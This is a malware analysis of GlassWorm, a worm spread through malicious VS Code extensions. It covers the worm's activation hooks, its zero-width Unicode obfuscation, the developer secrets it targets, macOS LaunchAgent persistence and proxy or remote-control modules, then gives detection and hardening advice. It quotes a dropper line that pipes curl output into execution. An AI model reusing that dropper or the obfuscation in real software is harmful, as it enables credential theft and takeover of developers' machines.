GlassWorm Malware Weaponizing VS Code Extensions

GlassWorm is best classified as a self-propagating supply-chain worm implemented as a VS Code extension loader, with secondary OS-level implants. Its defining characteristic is credential-driven lateral movement through developer ecosystems, not network exploitation.

Core Properties

Property	Detail
Initial vector	Malicious VS Code / OpenVSX extensions
Propagation	Stolen publisher credentials + extension auto-updates
Execution context	VS Code extension host (Node.js)
OS targets	Windows (early), macOS (later waves)
Payload languages	JavaScript/TypeScript → Rust (compiled)
Objectives	Credential theft, wallet exfil, proxying, remote control

Stage 1: Malicious Extension Mechanics

Entry Point

GlassWorm extensions typically hook into high-frequency activation events:

"activationEvents": [
  "onStartupFinished",
  "onLanguage:*",
  "workspaceContains:**/*"
]

This ensures execution on:

VS Code startup
Any workspace open
Any language file load

Obfuscation Techniques

Observed techniques include:

Zero-width Unicode characters (\u200B, \u2060) inserted into identifiers
Functionally equivalent but visually identical variable names
Deferred eval() / Function() execution
Encrypted strings decrypted at runtime

Example pattern:

const _=\u200brequire('child_process');

These bypass:

Marketplace static review
Regex-based scanners
Manual visual inspection

Stage 2: Credential & Secret Harvesting

Targeted Secrets

GlassWorm focuses on high-leverage developer secrets:

Source	Files / APIs
GitHub	`~/.config/gh/hosts.yml`, env vars
npm	`~/.npmrc`, VS Code settings sync
OpenVSX / VS Marketplace	Publisher tokens
Cloud	AWS/GCP/Azure env vars
Crypto	Browser wallet extension storage

Why Extensions Are Ideal

VS Code runs with developer trust
Access to filesystem APIs
Ability to spawn child processes
No EDR visibility by default

Once publisher tokens are stolen:

Attacker updates legitimate extensions
Malicious update auto-propagates
Worm spreads without user interaction

Stage 3: macOS-Specific Payload Deployment

Dropper Behavior (macOS)

From Node.js:

child_process.exec("curl -fsSL <url> | chmod +x && ./binary");

Payload characteristics:

Rust-compiled ELF/Mach-O
Stripped symbols
Randomized filenames
Stored under:
- ~/Library/Application Support/
- ~/Library/LaunchAgents/
- /tmp/ (initial staging)

Persistence

Common persistence mechanisms:

~/Library/LaunchAgents/com.apple.<random>.plist

Capabilities:

Auto-start on user login
Background execution
No UI artifacts

Stage 4: Post-Exploitation Capabilities

Observed Payload Modules

SOCKS5 Proxy
- Turns dev Mac into relay node
- Used for fraud / anonymization
HVNC / VNC
- Invisible desktop session
- Full interactive control
C2 Communication
- HTTPS + domain flux
- Blockchain-anchored C2 pointers (later waves)

Detection & Forensics (macOS)

Extension-Level

Inspect: ~/.vscode/extensions/
Look for:
- Unexpected post-install scripts
- Minified/obfuscated JS
- Network calls outside extension purpose

OS-Level

Check persistence:

ls ~/Library/LaunchAgents
launchctl list | grep -v apple

Process hunting:

ps aux | grep -E "rust|vnc|socks"
lsof -i -n

Network:

Unexpected outbound connections from:
- Code Helper
- Unknown Rust binaries

Why GlassWorm Is Dangerous (Technical Takeaway)

GlassWorm does not exploit OS vulnerabilities.

It exploits:

Trust in extensions
Trust in auto-updates
Trust in developer tooling
Centralized credential reuse

This makes it:

Hard to detect with traditional malware models
Extremely scalable
Particularly effective against macOS developers, who often lack aggressive endpoint controls

Hardening Recommendations

VS Code

Disable auto-update of extensions
Use extension allowlists
Audit publisher IDs, not names
Run VS Code with limited filesystem access where possible

Secrets

Short-lived tokens
Device-bound credentials
No long-term publisher tokens on dev machines

macOS

Monitor LaunchAgents creation
Alert on editor-spawned child processes
Treat developer machines as Tier-0 assets